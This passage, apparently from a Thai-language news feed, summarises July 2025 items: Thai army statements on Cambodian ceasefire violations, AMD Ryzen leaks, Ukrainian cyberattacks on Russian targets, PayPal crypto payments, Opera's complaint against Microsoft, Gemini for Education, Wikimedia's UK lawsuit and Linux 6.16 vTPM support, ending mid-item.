พร้อมสายขนาดมาตรฐาน 22 มม. ➡️ สินค้าจัดส่งจากฮ่องกง—สหรัฐฯ มีค่าภาษีเพิ่ม $10 ต่อเรือน https://www.techradar.com/health-fitness/smartwatches/the-all-new-pebble-watches-just-got-a-new-name-and-release-date-heres-how-to-get-one

กัมพูชาไม่สนหยุดยิง ไทยพร้อมโต้ขั้นเด็ดขาด : [THE MESSAGE] พลตรี วินธัย สุวารี โฆษกกองทัพบก อ่านแถลงการณ์กองทัพบก เรื่องการละเมิดข้อตกลงหยุดยิงโดยกองทัพกัมพูชา ระบุ ตามที่รัฐบาลไทย​และกัมพูชา​ ตกลงประกาศหยุดยิง มีผลตั้งแต่ 24.00 น.ของวันที่ 28 กรกฎาคม 2568​ ฝ่ายไทยปฏิบัติตามอย่างเคร่งครัด อย่างไรก็ตาม ได้รับรายงานจากหน่วยในพื้นที่ว่า ตลอดทั้งคืนถึงเช้ามืด กองทัพกัมพูชาละเมิดข้อตกลงหยุดยิงอีกครั้ง โดย 1.พื้นที่คานม้า กัมพูชาใช้อาวุธปืนเล็กยิงใส่แนวกำลังฝ่ายไทย 2.พื้นที่เขาพระวิหาร บริเวณภูมะเขือ กัมพูชาใช้อาวุธปืนเล็ก ยิงอย่างต่อเนื่อง ใช้เครื่องยิงลูกระเบิด ฝ่ายไทยจำเป็นต้องตอบโต้ เพื่อป้องกันตนเอง 3.พื้นที่ผามออีแดง ตรวจพบ​การยิงเครื่องยิงลูกระเบิด จากฝั่งกัมพูชาเข้ามาในเขตไทยอย่างชัดเจน เป็นการละเมิดข้อตกลงหยุดยิงอย่างร้ายแรง ครั้งที่ 2 สะท้อนถึงพฤติกรรมไม่เคารพพันธะกรณีระหว่างประเทศ ส่งผลกระทบต่อความไว้วางใจระหว่าง 2 ประเทศ กองทัพบกประณามการกระทำอันไม่รับผิดชอบของกองทัพกัมพูชา​อย่างถึงที่สุด ฝ่ายไทยจะยังอดทนอดกลั้น ยึดหลักสันติภาพและมนุษยธรรมสูงสุด และจะดำเนินการตามขั้นตอนที่เหมาะสมจำเป็นอย่างเด็ดขาด เพื่อปกป้องอธิปไตยและความปลอดภัยของประชาชนไทยโดยไม่ละเว้น​

สรุปสั้น กันงง เหตุการณ์การละเมิดการหยุดยิงของกัมพูชา 30 กรกฎาคม 2568 • พื้นที่ช่องอานม้า : พบการเติมกำลัง การใช้โดรน ตรวจการณ์ และการยิงตรวจแนว • พื้นที่เขาพระวิหาร (ภูมะเขือ ห้วยตามาเรีย ช่องคานม้า) พบการใช้ปืนเล็กและเครื่องยิงลูกระเบิดจนถึงเช้า • พื้นที่ผามออีแดง : พบการยิงเครื่องยิงลูกระเบิดมาตก ใกล้ฐานฯ ไทยไม่ได้ตอบโต้ #TruthFromThailand #กัมพูชายิงก่อน #CambodiaOpenedFire #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #กองทัพบกทันกระแส

🎙️ เรื่องเล่าจากห้องแล็บ: เมื่อ AMD ส่งชิป “PRO” และ “F” ลงตลาดเพื่อจับกลุ่มใหม่ ในช่วงปลายเดือนกรกฎาคม 2025 มีข้อมูลหลุดจากเว็บไซต์ ASUS ที่เผยให้เห็นว่า AMD เตรียมเปิดตัวซีพียูรุ่นใหม่ในตระกูล Ryzen 9000 ได้แก่: ➡️ Ryzen 7 9700F: เป็นรุ่นแรกในซีรีส์ Zen 5 ที่ไม่มี iGPU (กราฟิกในตัว) โดยมีสเปกใกล้เคียงกับ 9700X คือ 8 คอร์ 16 เธรด, L3 cache 32MB, base clock 3.8GHz และ TDP 65W เหมาะสำหรับผู้ใช้ที่มีการ์ดจอแยกอยู่แล้ว ➡️ Ryzen PRO 9000 Series: เป็นซีพียูสำหรับองค์กรขนาดเล็กหรือเวิร์กสเตชันระดับเริ่มต้น โดยมี 3 รุ่นย่อย: - PRO 9 9945: 12 คอร์ 24 เธรด, base clock 3.4GHz, L3 cache 64MB - PRO 7 9745: 8 คอร์ 16 เธรด, base clock 3.8GHz, L3 cache 32MB - PRO 5 9645: 6 คอร์ 12 เธรด, base clock 3.9GHz, L3 cache 32MB ทั้งหมดมี TDP 65W และใช้สถาปัตยกรรม Granite Ridge (Zen 5) เหมือนกับรุ่นคอนซูเมอร์ แต่เน้นความเสถียรและการจัดการสำหรับองค์กร ✅ Ryzen 7 9700F เป็นซีพียู Zen 5 รุ่นแรกที่ไม่มี iGPU ➡️ ต้องใช้การ์ดจอแยกในการแสดงผล ➡️ สเปกใกล้เคียงกับ 9700X แต่ราคาถูกกว่า ✅ PRO 9000 Series เป็นรุ่นสำหรับองค์กรขนาดเล็ก ➡️ มี 3 รุ่นย่อย: PRO 9 9945, PRO 7 9745, PRO 5 9645 ➡️ ใช้สเปกใกล้เคียงกับรุ่นคอนซูเมอร์แต่เน้นความเสถียร ✅ PRO 9 9945 มีสเปกเท่ากับ Ryzen 9 9900X แต่ clock ต่ำกว่า ➡️ ลด TDP จาก 120W เหลือ 65W เพื่อความประหยัดพลังงาน ➡️ เหมาะกับองค์กรที่ต้องการประสิทธิภาพแต่ควบคุมความร้อน ✅ PRO 7 9745 มีสเปกเหมือนกับ Ryzen 7 9700F ➡️ เหมาะสำหรับเวิร์กสเตชันระดับกลาง ➡️ ใช้ได้กับเมนบอร์ด AM5 ที่รองรับ Zen 5 ✅ PRO 5 9645 ใกล้เคียงกับ Ryzen 5 9600X ➡️ ยังไม่มีข้อมูล boost clock ➡️ เหมาะสำหรับงานทั่วไปในองค์กร https://wccftech.com/amd-prepares-granite-ridge-pro-chips-and-ryzen-7-9700f-for-consumers-as-spotted-on-asus-website-core-clock-cache-and-tdp-leaked/

🎙️ เรื่องเล่าจากแนวรบไซเบอร์: เมื่อยูเครนโจมตีรัสเซียด้วยข้อมูลแทนกระสุน ในช่วงปลายเดือนกรกฎาคม 2025 ยูเครนได้เปิดปฏิบัติการไซเบอร์สองแนวพร้อมกัน: 1️⃣ การโจมตีแหลมไครเมีย หน่วยข่าวกรองทหารยูเครน (HUR) เปิดปฏิบัติการพิเศษด้วยการโจมตีแบบ DDoS (Distributed Denial-of-Service) ใส่ระบบสารสนเทศของหน่วยงานปกครองรัสเซียในไครเมีย ส่งผลให้ระบบเครือข่ายและข้อมูลของรัฐบาลท้องถิ่นเป็นอัมพาต พร้อมกับการขโมยข้อมูลกว่า 100TB ก่อนลบข้อมูลทั้งหมดออกจากเซิร์ฟเวอร์ 2️⃣ การโจมตีสายการบิน Aeroflot กลุ่มแฮกเกอร์ Silent Crow และ Belarusian Cyber Partisans อ้างว่าได้แทรกซึมระบบของ Aeroflot มานานกว่า 1 ปี ก่อนจะทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง ทำให้ต้องยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ของบริษัทใช้งานไม่ได้3 ทั้งสองปฏิบัติการนี้เกิดขึ้นหลังจากยูเครนร่วมมือกับกลุ่ม BO Team และ Ukrainian Cyber Alliance โจมตีบริษัท Gaskar Group ผู้ผลิตโดรนรายใหญ่ของรัสเซีย ทำลายข้อมูลกว่า 47TB และทำให้การผลิตโดรนหยุดชะงัก ✅ ยูเครนโจมตีไซเบอร์ใส่หน่วยงานรัสเซียในแหลมไครเมีย ➡️ ใช้ DDoS ทำให้ระบบเครือข่ายของรัฐบาลท้องถิ่นเป็นอัมพาต ➡️ ขโมยข้อมูลกว่า 100TB ก่อนลบออกจากเซิร์ฟเวอร์ทั้งหมด ✅ สายการบิน Aeroflot ถูกโจมตีโดย Silent Crow และ Cyber Partisans ➡️ ทำลายเซิร์ฟเวอร์กว่า 7,000 เครื่อง และระบบ IT ทั้งหมดของบริษัท3 ➡️ ยกเลิกเที่ยวบินกว่า 100 เที่ยว และเว็บไซต์ใช้งานไม่ได้ ✅ กลุ่มแฮกเกอร์ Silent Crow แทรกซึมระบบ Aeroflot มานานกว่า 1 ปี ➡️ ขโมยข้อมูลผู้โดยสาร, อีเมลภายใน, และไฟล์เสียงการสื่อสาร6 ➡️ ขู่ว่าจะเปิดเผยข้อมูลส่วนตัวของผู้โดยสารทั้งหมดในอนาคต ✅ การโจมตี Gaskar Group ทำให้การผลิตโดรนของรัสเซียหยุดชะงัก ➡️ ข้อมูลการออกแบบโดรนและซอร์สโค้ดถูกขโมยและส่งให้กองทัพยูเครน5 ➡️ ระบบบัญชี, การผลิต และอินเทอร์เน็ตของบริษัทถูกทำลาย ✅ ยูเครนใช้ไซเบอร์เป็นยุทธศาสตร์หลักในการทำสงคราม ➡️ มุ่งโจมตีโครงสร้างพื้นฐานของรัสเซียแทนการปะทะโดยตรง ➡️ สร้างความเสียหายเชิงยุทธศาสตร์โดยไม่ต้องใช้ระเบิด ‼️ การโจมตีไซเบอร์อาจส่งผลกระทบต่อพลเรือนและข้อมูลส่วนบุคคล ⛔ ข้อมูลผู้โดยสาร Aeroflot ถูกขโมยและอาจถูกเปิดเผยสาธารณะ3 ⛔ เสี่ยงต่อการละเมิดสิทธิส่วนบุคคลและความปลอดภัยของประชาชน ‼️ การโจมตีโครงสร้างพื้นฐานอาจนำไปสู่การตอบโต้ที่รุนแรงจากรัสเซีย ⛔ รัสเซียอาจเพิ่มมาตรการตอบโต้ทางไซเบอร์หรือทางทหาร ⛔ เสี่ยงต่อการขยายความขัดแย้งไปยังประเทศพันธมิตร ‼️ การใช้ DDoS เป็นเครื่องมือเบี่ยงเบนความสนใจอาจทำให้การป้องกันล่าช้า ⛔ องค์กรอาจไม่ทันสังเกตการโจมตีหลักที่เกิดขึ้นพร้อมกัน ⛔ ต้องใช้ทรัพยากรเพิ่มในการตรวจสอบและป้องกันหลายแนวทาง ‼️ การโจมตีแบบทำลายข้อมูลอาจทำให้การฟื้นฟูระบบเป็นไปได้ยาก ⛔ Aeroflot และ Gaskar อาจต้องใช้เวลาหลายเดือนในการกู้คืนระบบ ⛔ หากไม่มีสำรองข้อมูลแบบออฟไลน์ อาจสูญเสียข้อมูลถาวร https://www.tomshardware.com/tech-industry/cyber-security/ukraine-strikes-back-at-russia-launches-cyberattack-on-forces-in-crimea-as-independent-hackers-target-airline-aeroflot-grounding-dozens-of-planes

💸 เรื่องเล่าจากกระเป๋าเงินดิจิทัล: เมื่อ PayPal เชื่อมโลกคริปโตสู่การค้าจริง ในช่วงสัปดาห์สุดท้ายของเดือนกรกฎาคม 2025 PayPal ประกาศเปิดตัวฟีเจอร์ “Pay with Crypto” ที่จะให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุลเงินดิจิทัล เช่น BTC, ETH, XRP, USDT, USDC และ SOL โดยผู้ใช้สามารถเชื่อมต่อกระเป๋าเงินจากแพลตฟอร์มยอดนิยม เช่น Coinbase, MetaMask, OKX และ Binance ได้โดยตรง ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์สหรัฐหรือ stablecoin PYUSD ทันทีที่ชำระเงิน ทำให้ร้านค้าได้รับเงินอย่างรวดเร็วและลดความเสี่ยงจากความผันผวนของคริปโต ขณะเดียวกัน PayPal เสนออัตราดอกเบี้ย 4% ต่อปีสำหรับยอดเงิน PYUSD ที่เก็บไว้ในระบบ เพื่อกระตุ้นการใช้งานและถือครอง ✅ PayPal เปิดตัวฟีเจอร์ “Pay with Crypto” ให้ร้านค้าในสหรัฐฯ รับชำระเงินด้วยคริปโตมากกว่า 100 สกุล ➡️ รองรับ BTC, ETH, XRP, USDT, USDC, BNB, SOL และอื่นๆ ➡️ เชื่อมต่อกับกระเป๋าเงินยอดนิยม เช่น Coinbase, MetaMask, OKX, Binance ✅ ธุรกรรมจะถูกแปลงเป็นเงินดอลลาร์หรือ PYUSD ทันทีที่ชำระเงิน ➡️ ลดความเสี่ยงจากความผันผวนของคริปโต ➡️ ช่วยให้ร้านค้าได้รับเงินเร็วขึ้นและจัดการบัญชีง่ายขึ้น ✅ ค่าธรรมเนียมธุรกรรมเริ่มต้นที่ 0.99% และอาจเพิ่มเป็น 1.5% หลังปีแรก ➡️ ต่ำกว่าค่าธรรมเนียมบัตรเครดิตระหว่างประเทศที่เฉลี่ย 1.57% ➡️ ลดต้นทุนการรับชำระเงินจากลูกค้าต่างประเทศได้ถึง 90% ✅ ร้านค้าที่ถือ PYUSD บน PayPal จะได้รับดอกเบี้ย 4% ต่อปี ➡️ เป็นแรงจูงใจให้ถือครอง stablecoin ของ PayPal ➡️ PYUSD ถูกออกแบบให้มีมูลค่าคงที่ 1:1 กับดอลลาร์สหรัฐ และออกโดย Paxos Trust Company ✅ ฟีเจอร์นี้เป็นส่วนหนึ่งของกลยุทธ์เชื่อมโลกการเงินดั้งเดิมกับ Web3 ➡️ PayPal มีผู้ใช้งานกว่า 650 ล้านรายทั่วโลก ➡️ เป็นการเปิดประตูสู่เศรษฐกิจคริปโตมูลค่า $3.9 ล้านล้านดอลลาร์ ‼️ ผู้ซื้อจากต่างประเทศอาจต้องจ่ายค่าธรรมเนียมสูงถึง 10% ต่อธุรกรรม ⛔ อาจทำให้ลูกค้าต่างประเทศลังเลที่จะใช้คริปโตในการซื้อสินค้า ⛔ ส่งผลต่อยอดขายของร้านค้าที่เน้นตลาดต่างประเทศ ‼️ การถือครอง PYUSD มีความเสี่ยงด้านกฎระเบียบและการรับประกัน ⛔ PYUSD ไม่ได้รับการคุ้มครองจาก FDIC หรือ SIPC ⛔ หากเกิดการโจรกรรมหรือระบบล่ม ผู้ใช้ต้องรับผิดชอบเอง ‼️ การแปลงคริปโตเป็น fiat ผ่านระบบกลางอาจขัดกับหลักการกระจายอำนาจ ⛔ ผู้ใช้ต้องพึ่งพา PayPal ในการแปลงและจัดการธุรกรรม ⛔ อาจไม่เหมาะกับผู้ใช้ที่ต้องการควบคุมสินทรัพย์แบบเต็มรูปแบบ ‼️ การถือครอง PYUSD เพื่อรับดอกเบี้ยอาจถูกตีความว่าเป็นการลงทุน ⛔ อาจเข้าข่ายหลักทรัพย์ตามกฎหมายบางประเทศ ⛔ เสี่ยงต่อการถูกตรวจสอบหรือจำกัดการใช้งานในอนาคต https://www.techspot.com/news/108847-paypal-us-merchants-accept-over-100-cryptocurrencies-including.html

🧭 เรื่องเล่าจากเบราว์เซอร์: เมื่อ Opera ลุกขึ้นสู้กับ Edge เพื่อความเป็นธรรมในการแข่งขัน ในเดือนกรกฎาคม 2025 Opera ได้ยื่นคำร้องต่อ CADE (หน่วยงานกำกับดูแลการแข่งขันของบราซิล) โดยกล่าวหาว่า Microsoft ใช้ “กลยุทธ์การออกแบบที่ชักจูง” หรือที่เรียกว่า dark patterns เพื่อผลักดันให้ผู้ใช้ Windows ใช้ Edge เป็นเบราว์เซอร์หลัก ทั้งที่ผู้ใช้ตั้งค่าเบราว์เซอร์อื่นไว้แล้ว Opera ระบุว่า Microsoft: - ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์ (OEMs) เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น - ไม่เปิดโอกาสให้เบราว์เซอร์อื่น เช่น Opera ได้รับการติดตั้งล่วงหน้า - ใช้เครื่องมือในระบบ เช่น Widgets, Teams, Search และ Outlook เปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ - แสดงข้อความรบกวนเมื่อผู้ใช้พยายามดาวน์โหลดเบราว์เซอร์อื่น Opera หวังว่าบราซิลจะเป็นตัวอย่างให้ประเทศอื่นดำเนินการตาม และเรียกร้องให้ Microsoft ยุติการใช้กลยุทธ์เหล่านี้ พร้อมเปิดโอกาสให้ผู้ใช้เลือกเบราว์เซอร์ได้อย่างเสรี ✅ Opera ยื่นคำร้องต่อ CADE ในบราซิล กล่าวหา Microsoft ใช้กลยุทธ์ไม่เป็นธรรมเพื่อผลักดัน Edge ➡️ เป็นการฟ้องร้องในตลาดสำคัญของ Opera ซึ่งมีผู้ใช้จำนวนมาก ➡️ หวังให้บราซิลเป็นแบบอย่างระดับโลกในการควบคุม Big Tech ✅ Microsoft ถูกกล่าวหาว่าใช้ “manipulative design tactics” และ “dark patterns” ใน Windows ➡️ เช่น การเปิดไฟล์ PDF ผ่าน Edge แม้ผู้ใช้ตั้งค่าเบราว์เซอร์อื่น ➡️ การแสดงข้อความรบกวนเมื่อพยายามดาวน์โหลดเบราว์เซอร์คู่แข่ง ✅ Opera ระบุว่า Microsoft ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น ➡️ ส่งผลให้เบราว์เซอร์อื่นไม่มีโอกาสถูกติดตั้งล่วงหน้า ➡️ เป็นการปิดกั้นการแข่งขันตั้งแต่ระดับฮาร์ดแวร์ ✅ Opera เรียกร้องให้ CADE สั่งให้ Microsoft ยุติการใช้ dark patterns และเปิดโอกาสให้เบราว์เซอร์อื่นได้ติดตั้งล่วงหน้า ➡️ รวมถึงการยกเลิกข้อกำหนด “S mode” ที่จำกัดการติดตั้งซอฟต์แวร์จากเว็บ ➡️ เพื่อให้ผู้ใช้สามารถเลือกเบราว์เซอร์ได้อย่างอิสระ ✅ นี่ไม่ใช่ครั้งแรกที่ Opera ฟ้อง Microsoft ด้วยข้อกล่าวหาเรื่องการผูกขาดเบราว์เซอร์ ➡️ เคยฟ้องในสหภาพยุโรปเมื่อปี 2007 กรณี Internet Explorer ➡️ และเคยเรียกร้องให้ Edge ถูกจัดเป็น “gatekeeper” ภายใต้กฎหมาย DMA ของ EU แต่ไม่สำเร็จ ‼️ ผู้ใช้ Windows อาจไม่รู้ว่าการตั้งค่าเบราว์เซอร์ของตนถูกละเมิด ⛔ เครื่องมือในระบบเปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้ ⛔ ส่งผลให้เกิดความสับสนและลดความไว้วางใจในระบบ ‼️ การใช้ dark patterns อาจบั่นทอนเสรีภาพในการเลือกใช้ซอฟต์แวร์ของผู้บริโภค ⛔ ผู้ใช้ถูกชักจูงโดยไม่รู้ตัวให้ใช้ Edge ⛔ เป็นการลดโอกาสของเบราว์เซอร์คู่แข่งในการแข่งขันอย่างเป็นธรรม ‼️ การให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์เพื่อให้ติดตั้ง Edge อาจละเมิดหลักการการแข่งขันเสรี ⛔ เบราว์เซอร์อื่นถูกกีดกันตั้งแต่ระดับโรงงาน ⛔ ส่งผลให้ผู้ใช้ไม่มีทางเลือกตั้งแต่ซื้อเครื่อง ‼️ หากไม่มีการควบคุม อาจเกิดการผูกขาดในตลาดเบราว์เซอร์โดยไม่รู้ตัว ⛔ ส่งผลต่อความหลากหลายของนวัตกรรมและความเป็นส่วนตัวของผู้ใช้ ⛔ อาจต้องพึ่งพาการแทรกแซงจากหน่วยงานกำกับดูแลในหลายประเทศ https://www.neowin.net/news/opera-files-complaint-against-microsoft-for-manipulating-customers-into-using-edge/

🎓 เรื่องเล่าจากห้องเรียนแห่งอนาคต: Gemini 2.5 Pro กับภารกิจปฏิวัติการศึกษา ในเดือนกรกฎาคม 2025 Google ได้ประกาศเพิ่มขีดจำกัดการใช้งานของโมเดล AI ขั้นสูง Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ “Gemini for Education” โดยไม่คิดค่าใช้จ่าย ซึ่งรวมถึงนักเรียน นักศึกษา และคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย และอีกหลายประเทศที่กำลังพัฒนา Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาโดยเฉพาะเพื่อการเรียนรู้ โดยอิงจากหลักการของ “learning science” เช่น การลดภาระทางความคิด, การส่งเสริมการเรียนรู้เชิงรุก, และการปรับเนื้อหาให้เหมาะกับผู้เรียนแต่ละคน ผลการประเมินจากผู้เชี่ยวชาญด้านการสอนกว่า 200 คน พบว่า Gemini 2.5 Pro ได้รับคะแนนสูงสุดในทุกหมวดหมู่เมื่อเทียบกับโมเดลอื่น เช่น GPT-4o และ Claude 3.7 Sonnet โดยเฉพาะในด้านการสนับสนุนเป้าหมายการเรียนรู้และการอธิบายเนื้อหาอย่างมีเหตุผล ✅ Google เพิ่มขีดจำกัดการใช้งาน Gemini 2.5 Pro ให้กับผู้ใช้ในโครงการ Gemini for Education โดยไม่คิดค่าใช้จ่าย ➡️ ครอบคลุมนักเรียนและคณาจารย์ในหลายประเทศ เช่น สหรัฐฯ อินเดีย บราซิล ญี่ปุ่น และอินโดนีเซีย ➡️ เป็นส่วนหนึ่งของ Google Workspace for Education ✅ Gemini 2.5 Pro ได้รับการปรับแต่งด้วย LearnLM ซึ่งเป็นโมเดล AI ที่ออกแบบมาเพื่อการเรียนรู้โดยเฉพาะ ➡️ อิงจากหลักการ learning science เช่น การลด cognitive load และการปรับเนื้อหาให้เหมาะกับผู้เรียน ➡️ ได้รับการยอมรับจากผู้เชี่ยวชาญด้านการสอนว่าเป็นโมเดลที่ดีที่สุดสำหรับการเรียนรู้ ✅ ผลการประเมินจาก “Arena for Learning” พบว่า Gemini 2.5 Pro ได้รับความนิยมสูงสุดจากผู้เชี่ยวชาญ ➡️ ได้รับการเลือกใน 73.2% ของการเปรียบเทียบแบบ blind test กับโมเดลอื่น ➡️ เหนือกว่า GPT-4o และ Claude 3.7 ในทุกหลักการของ pedagogy ✅ Google ยังมอบสิทธิ์ใช้งาน Colab Pro ฟรี 1 ปีให้กับนักศึกษาและคณาจารย์ในสหรัฐฯ ➡️ เพื่อสนับสนุนการวิเคราะห์ข้อมูลและการฝึกโมเดล AI สำหรับงานวิจัย ➡️ เป็นส่วนหนึ่งของกลยุทธ์สร้างความผูกพันระยะยาวกับผู้ใช้ในภาคการศึกษา ✅ Gemini for Education มาพร้อมการปกป้องข้อมูลระดับองค์กร ➡️ ข้อมูลการใช้งานจะไม่ถูกตรวจสอบโดยมนุษย์หรือใช้ฝึกโมเดล AI ➡️ มีระบบควบคุมการใช้งานโดยผู้ดูแลระบบของสถาบัน https://www.neowin.net/news/gemini-for-education-now-offers-significantly-higher-usage-limits-to-gemini-25-pro-model/

FENGSHUI DAILY อัพเดตทุกวัน ที่นี่ที่เดียว สีเสริมดวง เสริมความเฮง ทิศมงคล เวลามงคล อย่าลืมดูกัน เมื่อเริ่มวันใหม่ วันพฤหัสบดีที่ 31 เดือนกรกฎาคม พ.ศ.2568 ___________________________________ FengshuiBizDesigner ฮวงจุ้ย...ออกแบบได้

🧠 เรื่องเล่าจากสารานุกรมเสรี: เมื่อกฎหมายความปลอดภัยออนไลน์กลายเป็นภัยต่อผู้สร้างความรู้ ในเดือนกรกฎาคม 2025 Wikimedia Foundation ซึ่งเป็นองค์กรไม่แสวงหากำไรที่ดูแล Wikipedia ได้ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงแห่งลอนดอน โดยมุ่งเป้าไปที่ “Categorisation Regulations” ของกฎหมาย Online Safety Act (OSA) ซึ่งอาจจัดให้ Wikipedia เป็น “Category 1 service”—กลุ่มเว็บไซต์ที่มีข้อบังคับเข้มงวดที่สุด หาก Wikipedia ถูกจัดอยู่ในหมวดนี้ จะต้องตรวจสอบตัวตนของอาสาสมัครที่แก้ไขบทความ ซึ่งขัดกับหลักการพื้นฐานของ Wikipedia ที่เน้นการเปิดกว้างและไม่เก็บข้อมูลส่วนตัวของผู้ใช้ การบังคับให้เปิดเผยตัวตนอาจทำให้อาสาสมัครเสี่ยงต่อการถูกตามรอย, ฟ้องร้อง, หรือแม้แต่ถูกคุมขังในบางประเทศ Wikimedia ยืนยันว่า Wikipedia ไม่ควรถูกจัดอยู่ในกลุ่มเดียวกับแพลตฟอร์มเชิงพาณิชย์อย่าง Facebook หรือ TikTok เพราะไม่มีโฆษณา, ไม่ขายข้อมูล, และดำเนินงานโดยอาสาสมัครกว่า 260,000 คนทั่วโลก ✅ Wikimedia Foundation ยื่นฟ้องรัฐบาลสหราชอาณาจักรต่อศาลสูงในเดือนกรกฎาคม 2025 ➡️ มุ่งเป้าไปที่ Categorisation Regulations ของกฎหมาย Online Safety Act ➡️ เป็นการฟ้องเฉพาะข้อกำหนด ไม่ใช่ตัวกฎหมายทั้งหมด ✅ Wikipedia อาจถูกจัดเป็น Category 1 service ซึ่งมีข้อบังคับเข้มงวดที่สุด ➡️ ต้องตรวจสอบตัวตนของผู้ใช้และอาสาสมัคร ➡️ ต้องปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการรายงาน ✅ Wikimedia เตือนว่าข้อกำหนดเหล่านี้จะกระทบต่อความปลอดภัยของอาสาสมัคร ➡️ เสี่ยงต่อการถูกละเมิดข้อมูล, ถูกตามรอย, หรือถูกดำเนินคดี ➡️ อาจทำให้อาสาสมัครจำนวนมากเลิกแก้ไขบทความ ✅ Wikipedia มีผู้เข้าชมกว่า 15 พันล้านครั้งต่อเดือนทั่วโลก และ 776 ล้านครั้งในสหราชอาณาจักร ➡️ มีอาสาสมัครในสหราชอาณาจักรหลายพันคน ➡️ เป็นแหล่งเรียนรู้สำคัญในระบบการศึกษาของประเทศ เช่น Wikipedia ภาษาเวลส์ ✅ ผู้ร่วมฟ้องคืออาสาสมัครในสหราชอาณาจักรที่ใช้นามแฝงว่า “Zzuuzz” ➡️ เพื่อแสดงให้เห็นถึงผลกระทบต่อผู้ใช้งานจริง ➡️ เป็นคดีแรกที่มีอาสาสมัคร Wikipedia เข้าร่วมเป็นผู้ฟ้องร่วม ✅ Wikimedia เรียกร้องให้ศาลตั้งบรรทัดฐานใหม่ในการคุ้มครองโครงการสาธารณะบนอินเทอร์เน็ต ➡️ Wikipedia เป็นเว็บไซต์ระดับโลกที่ดำเนินงานโดยไม่แสวงหากำไร ➡️ เป็นแหล่งข้อมูลสำคัญที่ใช้ฝึกโมเดล AI และส่งเสริมการรู้เท่าทันสื่อ https://wikimediafoundation.org/news/2025/07/17/wikimedia-foundation-challenges-uk-online-safety-act-regulations/

ช่วงเวลาที่เครื่องบินรบของกองทัพอากาศไทยทิ้งระเบิดใส่ฐานที่มั่นของกัมพูชา เหตุการณ์เมื่อวันที่ 28 กรกฎาคม 2568

🔐 เรื่องเล่าจากเคอร์เนล: เมื่อ Linux กลายเป็นแพลตฟอร์มที่ปลอดภัยที่สุดสำหรับงานลับสุดยอด ในเดือนกรกฎาคม 2025 Linux Kernel 6.16 ได้เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์ ซึ่งเป็นการรวมเทคโนโลยี Secure Encrypted Virtualization (SEV) และ Virtual Trusted Platform Module (vTPM) เข้าด้วยกัน เพื่อสร้างสภาพแวดล้อมการทำงานที่ปลอดภัยและแยกออกจากระบบโฮสต์โดยสิ้นเชิง vTPM คือ TPM แบบเสมือนที่ทำงานภายใน VM โดยถูกเข้ารหัสและแยกออกจาก hypervisor ด้วยเทคโนโลยี SEV-SNP ของ AMD ทำให้สามารถใช้ฟีเจอร์อย่าง Secure Boot, Measured Boot และ Remote Attestation ได้อย่างปลอดภัยในระบบคลาวด์หรือองค์กรที่ต้องการความมั่นคงสูง ฟีเจอร์นี้เหมาะกับองค์กรในภาคการเงิน, สาธารณสุข, และภาครัฐ ที่ต้องการความมั่นใจว่าข้อมูลสำคัญจะไม่ถูกเข้าถึงโดยผู้ให้บริการคลาวด์หรือระบบโฮสต์ที่ไม่ไว้วางใจ ✅ Linux Kernel 6.16 เพิ่มการรองรับ AMD SEV vTPM อย่างสมบูรณ์ ➡️ รองรับการสร้าง vTPM ภายใน VM ที่ถูกเข้ารหัสด้วย SEV-SNP ➡️ ใช้โปรโตคอลจาก AMD SVSM spec เพื่อให้ guest OS ติดต่อกับ vTPM ได้ ✅ vTPM ทำงานในหน่วยความจำที่ถูกแยกและเข้ารหัสโดยฮาร์ดแวร์ ➡️ ป้องกันการเข้าถึงจาก hypervisor และ guest OS ➡️ รองรับ TPM 2.0 เต็มรูปแบบ เช่น PCRs และการเข้ารหัสคีย์ ✅ รองรับการตรวจสอบความน่าเชื่อถือของระบบ (attestation) และ Secure Boot ➡️ เหมาะกับการใช้งานใน Zero Trust Architecture ➡️ ช่วยให้มั่นใจว่า VM ทำงานในสภาพแวดล้อมที่ปลอดภัยจริง ✅ เหมาะกับองค์กรที่ต้องการความปลอดภัยระดับสูง เช่น การเงิน, สาธารณสุข, และภาครัฐ ➡️ รองรับการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและการเข้ารหัส ➡️ ลดการพึ่งพาเฟิร์มแวร์หรือ TPM แบบ proprietary ✅ สามารถใช้งานร่วมกับ hypervisor อย่าง KVM และเครื่องมือจัดการ VM บน Linux ➡️ รองรับการตั้งค่า kernel เช่น CONFIG_TCG_SVSM=y ➡️ มีเครื่องมือสำหรับตรวจสอบสถานะการเข้ารหัสและการทำงานของ vTPM ‼️ การใช้งาน vTPM ต้องมีการตั้งค่าฮาร์ดแวร์และ BIOS ที่รองรับ SEV-SNP ⛔ หาก CPU หรือ BIOS ไม่รองรับ จะไม่สามารถเปิดใช้งานฟีเจอร์นี้ได้ ⛔ ต้องตรวจสอบว่าเปิดใช้งาน Secure Memory Encryption แล้ว ‼️ การเข้ารหัสและการตรวจสอบแบบฮาร์ดแวร์อาจเพิ่มภาระการประมวลผล ⛔ มี overhead ด้านประสิทธิภาพ โดยเฉพาะใน workload ที่ใช้ vTPM หนัก ⛔ ต้องวางแผนการจัดสรรทรัพยากรอย่างรอบคอบ ‼️ การตั้งค่า kernel และการคอมไพล์ต้องแม่นยำเพื่อให้ vTPM ทำงานได้สมบูรณ์ ⛔ ต้องเปิดใช้งานโมดูลที่เกี่ยวข้อง เช่น CONFIG_KVM_AMD_SEV ⛔ หากตั้งค่าผิด อาจทำให้ VM ไม่สามารถบูตหรือใช้งาน vTPM ได้ ‼️ การตรวจสอบความน่าเชื่อถือ 